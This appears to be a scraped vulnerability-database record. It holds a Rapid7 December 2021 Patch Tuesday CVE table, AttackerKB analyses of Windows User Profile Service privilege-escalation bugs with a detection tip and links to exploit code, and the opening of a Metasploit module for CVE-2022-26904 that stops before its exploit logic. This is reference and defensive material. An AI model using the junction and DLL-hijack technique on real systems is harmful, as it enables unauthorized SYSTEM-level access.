\n[CVE-2021-41365](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41365>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2021-42310](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42310>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43889](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43889>) | Microsoft Defender for IoT Remote Code Execution Vulnerability | No | No | 7.2 | Yes \n[CVE-2021-43888](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43888>) | Microsoft Defender for IoT Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-42312](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-42312>) | Microsoft Defender for IOT Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43247](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43247>) | Windows TCP/IP Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43237](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43237>) | Windows Setup Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43239](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43239>) | Windows Recovery Environment Agent Elevation of Privilege Vulnerability | No | No | 7.1 | No \n[CVE-2021-43231](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43231>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43880](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43880>) | Windows Mobile Device Management Elevation of Privilege Vulnerability | No | Yes | 5.5 | Yes \n[CVE-2021-43244](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43244>) | Windows Kernel Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2021-43246](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43246>) | Windows Hyper-V Denial of Service Vulnerability | No | No | 5.6 | No \n[CVE-2021-43232](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43232>) | Windows Event Tracing Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43248](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43248>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43214](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43214>) | Web Media Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43243](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43243>) | VP9 Video Extensions Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43228](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43228>) | SymCrypt Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2021-43227](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43227>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43235](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43235>) | Storage Spaces Controller Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43240](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43240>) | NTFS Set Short Name Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-40452](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40452>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-40453](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40453>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-41360](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41360>) | HEVC Video Extensions Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2021-43219](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43219>) | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 7.4 | No \n \n### Windows ESU Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Publicly Disclosed? | CVSSv3 | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2021-43215](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43215>) | iSNS Server Memory Corruption Vulnerability Can Lead to Remote Code Execution | No | No | 9.8 | Yes \n[CVE-2021-43238](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43238>) | Windows Remote Access Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43223](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43223>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-41333](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-41333>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43229>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43230](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43230>) | Windows NTFS Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-40441](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40441>) | Windows Media Center Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43883>) | Windows Installer Elevation of Privilege Vulnerability | No | Yes | 7.8 | No \n[CVE-2021-43234](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43234>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2021-43217](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43217>) | Windows Encrypting File System (EFS) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2021-43893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43893>) | Windows Encrypting File System (EFS) Elevation of Privilege Vulnerability | No | Yes | 7.5 | No \n[CVE-2021-43245](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43245>) | Windows Digital TV Tuner Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43224](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43224>) | Windows Common Log File System Driver Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2021-43226](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43226>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43207](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43207>) | Windows Common Log File System Driver Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2021-43233](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43233>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 7.5 | No \n[CVE-2021-43222](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43222>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43236](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43236>) | Microsoft Message Queuing Information Disclosure Vulnerability | No | No | 7.5 | Yes \n[CVE-2021-43216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43216>) | Microsoft Local Security Authority Server (lsasrv) Information Disclosure Vulnerability | No | No | 6.5 | Yes", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T22:12:53", "type": "rapid7blog", "title": "Patch Tuesday - December 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40441", "CVE-2021-40452", "CVE-2021-40453", "CVE-2021-4052", "CVE-2021-4053", "CVE-2021-4054", "CVE-2021-4055", "CVE-2021-4056", "CVE-2021-4057", "CVE-2021-4058", "CVE-2021-4059", "CVE-2021-4061", "CVE-2021-4062", "CVE-2021-4063", "CVE-2021-4064", "CVE-2021-4065", "CVE-2021-4066", "CVE-2021-4067", "CVE-2021-4068", "CVE-2021-41333", "CVE-2021-41360", "CVE-2021-41365", "CVE-2021-41379", "CVE-2021-42293", "CVE-2021-42294", "CVE-2021-42295", "CVE-2021-42309", "CVE-2021-42310", "CVE-2021-42311", "CVE-2021-42312", "CVE-2021-42313", "CVE-2021-42314", "CVE-2021-42315", "CVE-2021-42320", "CVE-2021-43207", "CVE-2021-43214", "CVE-2021-43215", "CVE-2021-43216", "CVE-2021-43217", "CVE-2021-43219", "CVE-2021-43222", "CVE-2021-43223", "CVE-2021-43224", "CVE-2021-43225", "CVE-2021-43226", "CVE-2021-43227", "CVE-2021-43228", "CVE-2021-43229", "CVE-2021-43230", "CVE-2021-43231", "CVE-2021-43232", "CVE-2021-43233", "CVE-2021-43234", "CVE-2021-43235", "CVE-2021-43236", "CVE-2021-43237", "CVE-2021-43238", "CVE-2021-43239", "CVE-2021-43240", "CVE-2021-43242", "CVE-2021-43243", "CVE-2021-43244", "CVE-2021-43245", "CVE-2021-43246", "CVE-2021-43247", "CVE-2021-43248", "CVE-2021-43255", "CVE-2021-43256", "CVE-2021-43875", "CVE-2021-43877", "CVE-2021-43880", "CVE-2021-43882", "CVE-2021-43883", "CVE-2021-43888", "CVE-2021-43889", "CVE-2021-43890", "CVE-2021-43891", "CVE-2021-43892", "CVE-2021-43893", "CVE-2021-43896", "CVE-2021-43899", "CVE-2021-43905", "CVE-2021-43907", "CVE-2021-43908", "CVE-2021-44228"], "modified": "2021-12-14T22:12:53", "id": "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "href": "https://blog.rapid7.com/2021/12/14/patch-tuesday-december-2021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-23T17:18:04", "description": "Windows Installer Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**NinjaOperator** at November 22, 2021 3:59pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**jbaines-r7** at December 03, 2021 7:27pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\n**gwillcox-r7** at November 24, 2021 9:16pm UTC reported:\n\nAccording to Florian Roth: \u201cYou can detect the exploitation of Windows InstallerFileTakeOver LPE CVE-2021-41379 with the published PoC with events from the \u2018Application\u2019 Eventlog \nSearch for EventID 1033 and the keyword \u2018test pkg\u2019 \n<https://twitter.com/cyb3rops/status/1462711685484101634>\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-41379", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41379", "CVE-2021-41739", "CVE-2021-41773", "CVE-2021-43883"], "modified": "2022-07-13T00:00:00", "id": "AKB:FE7E2037-F0E0-48D7-8F74-C9682BC04A73", "href": "https://attackerkb.com/topics/7LstI2clmF/cve-2021-41379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T14:47:42", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 29, 2022 12:10pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\n**gwillcox-r7** at March 30, 2022 4:21pm UTC reported:\n\nThis bug was evidently [used by LAPSUS$](<https://twitter.com/billdemirkapi/status/1508527492285575172>) in the wild as part of the attack on Okta.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-34484", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2021-08-24T00:00:00", "id": "AKB:2A1BFBBE-FD48-497E-8F3E-BB65670A94FA", "href": "https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-29T02:20:49", "description": "Windows User Profile Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 30, 2022 4:52pm UTC reported:\n\nThis is a bypass for [CVE-2022-21919](<https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919>) which is in turn a bypass for [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484?referrer=search>). As noted at <https://twitter.com/billdemirkapi/status/1508527492285575172>, CVE-2022-21919 was already being exploited in the wild by using the binary from <https://github.com/klinix5/ProfSvcLPE/blob/main/DoubleJunctionEoP/Release/UserProfileSvcEoP.exe>.\n\nThe vulnerability, near as I can tell, occurs due to the `CreateDirectoryJunction()` function inside `profext.dll` not appropriately validating things before creating a directory junction between two directories. This can allow an attacker to create a directory junction between a directory they have access to and another directory that they should not have access to, thereby granting them the ability to plant files in sensitive locations and or read sensitive files.\n\nThe exploit code for this, which was originally at <https://github.com/klinix5/SuperProfile> but which got taken down, is now available at <https://github.com/rmusser01/SuperProfile> and its associated forks. I have taken this code and updated it and touched it up a bit into a Metasploit exploit module that is now available at <https://github.com/rapid7/metasploit-framework/pull/16382>.\n\nThis exploit code utilizes this vulnerability to plant a malicious `comctl32.dll` binary in a location that the `Narrator.exe` program will try to load the DLL from when it starts. By utilizing the `ShellExecute` command with the `runas` option, we can force a UAC prompt to come up that will run the `consent.exe` program to run. If the `PromptOnSecureDesktop` setting is set to `1` which is the default, this will result in `consent.exe` running as `SYSTEM` on the secure desktop, and a new `narrator.exe` instance will also spawn as `SYSTEM` on the secure desktop, which will then load the malicious `comctl32.dll` DLL and allow us to execute our code as `SYSTEM`.\n\nNote that if `PromptOnSecureDesktop` is set to 0 under the key `HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System`, then this LPE will not be possible as the UAC prompt will spawn as the current user vs as `SYSTEM` on the restricted desktop, and therefore we will not achieve privilege elevation, so this is a workaround for the vulnerability whilst it is not patched.\n\nIt should be noted that as this stands the current exploit requires valid credentials for another user on the system who is a non-admin user and who has permissions to log into the target computer. They must also have a profile under `C:\\Users` for the exploit to function in its current state. There has been some rumors that it might be possible to do this without a secondary login, however nothing concrete has been found so far, so we are considering this a prerequisite for exploitation for the time being.\n\nWe, aka Rapid7, have reported this vulnerability to Microsoft and have given KLINIX5, who originally found this vulnerability and wrote the original exploit code, full credit for the discovery, however Microsoft have only given us this CVE number and have not provided a timeline on when they expect a fix for this vulnerability at this time. It is therefore recommended to use the mitigation above until an appropriate fix is developed.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-29T00:00:00", "type": "attackerkb", "title": "CVE-2022-26904", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-29T00:00:00", "id": "AKB:5ABBD3E2-AA30-41CB-96DA-34B5E76D030C", "href": "https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-15T11:22:27", "description": "Windows User Profile Service Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-21895.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at January 12, 2022 12:07am UTC reported:\n\nUpdate: As predicted there is a patch bypass for this, now labled as [CVE-2022-26904](<https://attackerkb.com/topics/RHSMbN1NQY/cve-2022-26904>)\n\nAccording to <https://twitter.com/KLINIX5/status/1480996599165763587> this appears to be a patch for the code blogged about at <https://halove23.blogspot.com/2021/10/windows-user-profile-service-0day.html>. The details on this bug can be found at <https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx> but I\u2019ll summarize them here for brevity.\n\nThe original incomplete patch, aka [CVE-2021-34484](<https://attackerkb.com/topics/qo2zIGKm9O/cve-2021-34484>) is explained best by Mitja Kolsek at <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> where he notes that bug was originally considered to be an arbitrary directory deletion bug that allowed a logged on user to delete a folder on the computer.\n\nHowever upon reviewing the fix KLINUX5 found that it was possible to not only bypass the fix, but also make the vulnerability more impactful.\n\nSpecifically by abusing the User Profile Service\u2019s code which creates a temporary user profile folder (to protect against the original user profile folder being damaged etc), and then copies folders and files from the original profile folder to the backup, one can instead place a symbolic link. When this symbolic link is followed, it can allow the attacker to create attacker-writeable folders in a protected location and then perform a DLL hijacking attack against high privileged system processes.\n\nUnfortunately when patching this bug, Microsoft correctly assumed that one should check that the temporary user folder (aka `C:\\Users\\TEMP`), is not a symbolic link, but didn\u2019t check to see if any of the folders under `C:\\Users\\TEMP` contains a symbolic link.\n\nNote that as noted in <https://blog.0patch.com/2021/11/micropatching-incompletely-patched.html> this bug does require winning a race condition so exploitation is 100% reliable however there are ways to win the race condition as was shown in the code for the patch bypass published at <https://github.com/klinix5/ProfSvcLPE/tree/main/DoubleJunctionEoP>.\n\nI\u2019d keep an eye on this one as KLINIX5 has a habit of finding patch bypasses for his bugs and if he says Microsoft has messed things up again, more than likely there will be another patch bypass for this bug. I\u2019m still looking into exactly what was patched here though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-08T00:00:00", "type": "attackerkb", "title": "CVE-2022-21919", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21895", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2022-02-08T00:00:00", "id": "AKB:C32E9872-B8A4-43F3-A8CC-05532AA65E51", "href": "https://attackerkb.com/topics/2sQXBnLJYq/cve-2022-21919", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-21T21:04:38", "description": "The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of the junctions it tries to link together. Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user. Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it as CVE-2022-26904. It is important to note that the credentials supplied for the second user to log in as in this exploit must be those of a normal non-admin user and these credentials must also corralate with a user who has already logged in at least once before. Additionally the current user running the exploit must have UAC set to the highest level, aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances where this setting has been changed either manually or as part of the installation process.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-21T17:05:48", "type": "metasploit", "title": "User Profile Arbitrary Junction Creation Local Privilege Elevation", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34484", "CVE-2022-21919", "CVE-2022-26904"], "modified": "2023-06-16T00:07:35", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_26904_SUPERPROFILE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_26904_superprofile/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Post::File\n include Msf::Exploit::FileDropper\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Version\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n include Msf::Exploit::EXE # Needed for generate_payload_dll\n prepend Msf::Exploit::Remote::AutoCheck\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'User Profile Arbitrary Junction Creation Local Privilege Elevation',\n 'Description' => %q{\n The user profile service, identified as ProfSrv, is vulnerable to a local privilege elevation vulnerability\n in its CreateDirectoryJunction() function due to a lack of appropriate checks on the directory structure of\n the junctions it tries to link together.\n\n Attackers can leverage this vulnerability to plant a malicious DLL in a system directory and then trigger a\n UAC prompt to cause this DLL to be loaded and executed by ProfSrv as the NT AUTHORITY\\SYSTEM user.\n\n Note that this bug was originally identified as CVE-2021-34484 and was subsequently patched a second time as\n CVE-2022-21919, however both patches were found to be insufficient. This bug is a patch bypass for\n CVE-2022-21919 and at the time of publishing, has not yet been patched, though plans are in place to patch it\n as CVE-2022-26904.\n\n It is important to note that the credentials supplied for the second user to log in as in this exploit must be\n those of a normal non-admin user and these credentials must also corralate with a user who has already logged in\n at least once before. Additionally the current user running the exploit must have UAC set to the highest level,\n aka \"Always Notify Me When\", in order for the code to be executed as NT AUTHORITY\\SYSTEM. Note however that\n \"Always Notify Me When\" is the default UAC setting on common Windows installs, so this would only affect instances\n where this setting has been changed either manually or as part of the installation process.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'KLINIX5', # Aka Abdelhamid Naceri. Original PoC w Patch Bypass\n 'Grant Willcox' # Metasploit module + Tweaks to PoC\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'Targets' => [\n [ 'Windows 11', { 'Arch' => ARCH_X64 } ]\n ],\n 'References' => [\n ['CVE', '2022-26904'],\n ['URL', 'https://github.com/rmusser01/SuperProfile'], # Original link was at https://github.com/klinix5/SuperProfile/ but was taken down. This is a backup.\n ['URL', 'https://web.archive.org/web/20220222105232/https://halove23.blogspot.com/2022/02/blog-post.html'], # Original blog post\n ['URL', 'https://github.com/klinix5/ProfSvcLPE/blob/main/write-up.docx'] # Discussion of previous iterations of this bug providing insight into patched functionality.\n ],\n 'DisclosureDate' => '2022-03-17', # Date MSRC supplied CVE number, bug is not patched atm.\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE, ],\n 'Reliability' => [ REPEATABLE_SESSION ], # Will need to double check this as this may require some updates to the code to get it to the point where it can be used repetitively.\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS, AUDIO_EFFECTS ]\n },\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 